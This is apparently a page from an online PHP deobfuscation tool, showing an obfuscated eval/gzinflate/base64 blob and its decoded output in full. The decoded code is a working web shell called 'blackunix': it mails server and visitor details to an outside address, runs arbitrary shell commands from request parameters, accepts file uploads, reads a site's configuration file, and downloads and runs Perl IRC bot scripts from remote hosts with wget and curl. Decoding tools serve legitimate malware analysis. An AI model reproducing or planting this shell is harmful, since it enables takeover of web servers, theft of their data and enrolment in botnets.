Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(gzinflate(str_rot13(base64_decode('1UtbRuM2FH4uM/wHrZoZJ7vEhu7sZwdVujQ4JTOQQyf0..

Decoded Output download

error_reporting(0);
if (!isset($_SESSION['bajak']))	{
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject 
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['ramz'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/blackunix.php";
rename($source, $desti);
}
if(isset($_GET['yena'])){
system("wget http://www.praxis-drkuch.de/modules/mod_articles_popular/tmpl/.../perl.txt;lwp-download http://www.praxis-drkuch.de/modules/mod_articles_popular/tmpl/.../perl.txt;curl -O http://www.praxis-drkuch.de/modules/mod_articles_popular/tmpl/.../perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;perl perl.txt;rm -fr perl.*;wget http://www.praxis-drkuch.de/modules/mod_articles_popular/tmpl/.../x.txt;lwp-download http://www.praxis-drkuch.de/modules/mod_articles_popular/tmpl/.../x.txt;curl -O http://www.praxis-drkuch.de/modules/mod_articles_popular/tmpl/.../x.txt;perl x.txt irc.blackunix.us;perl x.txt irc.reload-x.info;perl x.txt irc.morocanz.com;perl x.txt irc.blackunix.us;perl x.txt irc.reload-x.info;perl x.txt irc.zetaphiomega.us;rm -fr x.*");
}
if(isset($_GET['yena'])){
system("wget http://img.youtube.distribuidoradecarteraslara.com/yena.tar.gz;tar zxvf yena.tar.gz;rm -fr yena.tar.gz");
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>blackunix</title><br>";
echo "<font size=3 color=#FFF5EE>SCANNER FOR SALE<br>";
echo "<font size=3 color=#FFF5EE>RCI SCANNER: 300$<br>";
echo "<font size=3 color=#FFF5EE>ALL IN ONE SCANNER: contact staff blackunix<br><br>";
echo "<font size=3 color=#FFF5EE>for more info contact: bogel RamZkiE<br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
elseif(isset($_GET['rf'])){
$smtp = file_get_contents("../../configuration.php");
echo $rf;
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}
echo "<center><font size=5 color=#FFF5EE>irc.<font size=10 color=#FF0000>blackunix<font size=5 color=white>.us <font size=5 color=#FFF5EE>7000</center>";
?>
<link REL="SHORTCUT ICON" HREF="http://www.forum.romanisti-indonesia.com/Smileys/default/b_indonesia.gif"></link><body bgcolor="#000000"></body>

Did this file decode correctly?

Original Code

<?php eval(gzinflate(str_rot13(base64_decode('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')))); ?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 a42b7f3493d2b65b91cc081a58ecd1d8
Eval Count 1
Decode Time 128 ms